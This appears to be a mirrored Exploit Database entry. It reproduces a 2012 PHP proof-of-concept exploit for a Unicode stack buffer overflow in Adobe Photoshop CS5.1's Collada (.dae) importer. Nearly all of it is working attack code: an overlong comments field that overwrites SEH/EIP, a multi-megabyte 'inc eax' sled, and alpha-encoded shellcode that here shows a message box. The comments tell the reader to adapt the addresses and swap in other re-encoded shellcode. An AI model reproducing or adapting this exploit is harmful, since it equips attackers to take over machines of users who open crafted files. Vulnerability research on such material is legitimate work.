Adobe Photoshop CS5.1 – U3D.8BI Collada Asset Elements Stack Overflow

Exploit Database
509 阅读

作者： rgod

日期： 2012-05-11
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/18862/

100

101

102

103

104

105

106

107

108

109

<?php

// ~ Adobe Photoshop CS5.1 U3D.8bi Library Collada Asset Elements

// Unicode Conversion Stack Based Buffer Overflow poc (*.dae)

// (32bit/SEH) ~

// unicode overflow occurs when overlong asset elements are processed

// one could be able to return inside an ASCII memory region

// with an ultra large nop through assigning eip to ex. Photoshop.00630041.

// the shellcode should be alphabetic (high bytes order filtering and various issues)

// Usage: php 9sg_dae.php

// a file photoshop_sample.dae is created

// start Photoshop then open it through the File menu

// a message box pops, HEY!

// ~ rgod ~ - Advisory Reference: http://retrogod.altervista.org/9sg_photoshock_adv.htm

you shuld change addresses according to your system

then reencode with alpha2 (use eax alignment)

//say "Hey" MsgBox Shellcode

$code ="\x31\xc0\x31\xdb\x31\xc9\x31\xd2".

"\xeb\x2a\x59".

"\xbb\xca\x1d\xe4\x77". //LoadLibraryA(), kernel32.dll

"\x51\xff\xd3\xeb\x2f\x59\x51\x50".

"\xbb\x7a\x3d\xe6\x77". //GetProcAddress(), kernel32.dll

"\xff\xd3\xeb".

"\x34\x59\x31\xd2\x52\x51\x51\x52".

"\xff\xd0\x31\xd2\x50".

"\xb8\xf9\x68\xe6\x77". //ExitProcess(), kernel32.dll

"\xff\xd0\xe8\xd1\xff\xff".

"\xff\x75\x73\x65\x72\x33\x32\x2e".

"\x64\x6c\x6c\x00\xe8\xcc\xff\xff".

"\xff\x4d\x65\x73\x73\x61\x67\x65".

"\x42\x6f\x78\x41\x00\xe8\xc7\xff".

"\xff\xff\x48\x65\x79\x00";

$scode = "\x2d\x7d\x25\x5b\x7f". //sub preamble, align eax for alpha code,clean

"\x2d\x79\x22\x20\x6f". //sub, align ... the gap is repaired through the inc eax trick

"PYIIIIIIIIIIIIIIII7QZjA".

"XP0A0AkAAQ2AB2BB0BBABXP".

"8ABuJIvQYPp1IKp1YYtqJrZ".

"K4jpYmk8JuMM4PwpQKOyCZK".

"vORycaRpMksJUmkVqgyoKcz".

"KvTRyTqZrRr0QrqPRkOn0VQ".

"N20PnXzY0hZFpwYojpM8N1k".

"OIokOQebSauPrP3trDnPdrL".

"PlUPKXxLKOKOIorm1u2SRS3".

"QQw0esrbOd8raC0KXKwkOYo".

"KO3xSUt9uPA";

$eip="Ac"; //Photosho.00630041, return to our payload

$payload = str_repeat("\x40",4096000);//inc eax, needed , also nop equivalent, don't touch

$payload.=$scode;

$payload.= str_repeat("\x40",1024000);

$_xml ='<?xml version="1.0"?>'.

'<COLLADA xmlns="http://www.collada.org/2005/11/COLLADASchema" version="1.4.1">'.

'<asset>'.

'<contributor>'.

'<author>rgod</author>'.

'<authoring_tool>Maya 8.0 | ColladaMaya v3.02 | FCollada v3.2</authoring_tool>'.

'<comments>Collada Maya Export Options: bakeTransforms=0;exportPolygonMeshes=1;bakeLighting=0;isSampling=0;'.

'curveConstrainSampling=0;exportCameraAsLookat=0;'.

'exportLights=1;exportCameras=1;exportJointsAndSkin=1;'.

'exportAnimations=1;exportTriangles=1;exportInvisibleNodes=0;'.

'exportNormals=1;exportTexCoords=1;exportVertexColors=1;exportTangents=0;'.

'exportTexTangents=0;exportConstraints=1;exportPhysics=0;exportXRefs=1;'.

'dereferenceXRefs=0;cameraXFov=0;'.

str_repeat("A",170).

'cameraYFov=1;'.

str_repeat("a",100).

str_repeat("b",100).

str_repeat("c",100).

str_repeat("d",100).

str_repeat("e",100).

str_repeat("f",100).

str_repeat("g",100).

str_repeat("h",100).

str_repeat("i",100).

str_repeat("j",100).

str_repeat("k",100).

str_repeat("l",100).

str_repeat("m",100).

str_repeat("n",100).

"aaaabbbA".

$eip.

"ccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyy".

'</comments>'.

'<aaaa>'.

$payload.

'</aaaa>'.

'<copyright>'.

'</copyright>'.

'<source_data>file:///C:/vs2005/sample_data/untitled</source_data>'.

'</contributor>'.

'<created>2008-04-24T22:29:59Z</created>'.

'<modified>2099-02-21T22:52:44Z</modified>'.

'<unit meter="0.01" name="centimeter"/>'.

'<up_axis>Y_UP</up_axis>'.

'</asset>'.

'</COLLADA>';

file_put_contents("photoshop_sample.dae",$_xml);

echo "done";